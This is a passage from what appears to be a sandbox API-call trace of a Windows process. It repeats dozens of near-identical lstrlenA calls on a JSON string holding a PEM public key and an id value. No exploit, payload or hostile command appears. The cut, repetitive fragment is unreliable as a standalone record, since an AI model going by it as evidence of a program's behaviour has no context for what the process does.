KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.536] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.536] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.536] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.536] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.536] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.536] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.536] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.536] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.536] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.536] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.536] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.536] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.536] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.536] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.536] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.537] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.537] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.537] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.537] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.537] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.537] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.537] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.537] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.537] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.537] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.537] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.537] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.537] lstrlenA (lpString="-----BEGIN PUBLIC 